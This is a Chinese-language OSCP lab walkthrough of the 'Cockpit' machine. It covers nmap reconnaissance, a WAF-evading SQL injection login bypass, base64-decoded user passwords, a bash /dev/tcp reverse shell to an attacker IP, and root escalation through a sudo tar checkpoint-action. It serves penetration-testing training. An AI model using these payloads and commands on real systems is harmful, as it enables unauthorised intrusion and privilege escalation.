OSCP靶场–Cockpit
考点(sql注入绕过+sudo tar提权)
1.nmap扫描
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.229.10 -Pn -sV -sC --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-25 01:40 EDT
Nmap scan report for 192.168.229.10
Host is up (0.37s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
| 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: blaze
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
| margin: 0 0 10px;
|_ @font-face {
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=blaze/organizationName=d2737565435f491e97f49bb5b34ba02e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2024-03-25T05:40:28
|_Not valid after: 2124-03-01T05:40:28
2.user priv
## https://192.168.229.10:9090/#
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url https://192.168.229.10:9090/
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.229.10/
## 发现登陆口:sql注入,发现有waf拦截:
## payload:admin' or 1=1# 拦截
## payload:admin' || 1=1 -- -绕过拦截
http://192.168.229.10/login.php
## sql注入绕过waf,绕过登陆:
james Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=
cameron dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy
##
base64解码:
┌──(root㉿kali)-[~/Desktop]
└─# echo 'Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=' | base64 -d
canttouchhhthiss@455152
┌──(root㉿kali)-[~/Desktop]
└─# echo 'dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy' | base64 -d
thisscanttbetouchedd@455152
##
################################
## james:canttouchhhthiss@455152 登陆
## 如下有shell接口,反弹交互式shell:
https://192.168.229.10:9090/system/terminal
james@blaze:~$ /bin/bash -i >& /dev/tcp/192.168.45.214/443 0>&1
## 反弹shell:
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
connect to [192.168.45.214] from blaze.offsec [192.168.229.10] 42226
james@blaze:~$ whoami
whoami
james
james@blaze:~$
##
james@blaze:~$ cat local.txt
cat local.txt
72b406006e220fa7d3753c7f75fe56ca
###
james@blaze:/home$ cat /etc/passwd | grep -v nologin
cat /etc/passwd | grep -v nologin
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
pollinate:x:110:1::/var/cache/pollinate:/bin/false
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
james:x:1000:1000::/home/james:/bin/bash
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
sql注入绕过waf:绕过登陆:
3. root priv[sudo tar提权]
## sudo tar提权
#############
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for james on blaze:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on blaze:
(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *
################
##
ames@blaze:~$ sudo -l
sudo -l
Matching Defaults entries for james on blaze:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on blaze:
(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *
https://gtfobins.github.io/gtfobins/tar/#sudo
###
james@blaze:~$ sudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=/bin/sh
local.txt
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
96797baf2c3bb2507d24214e0eae1c9c
4.总结:
##
https://gtfobins.github.io/gtfobins/tar/#sudo
![[Java、Android面试]_13_map、set和list的区别](https://img-blog.csdnimg.cn/direct/ca0c1f713ff14f13b46d3f023aa3852b.png)
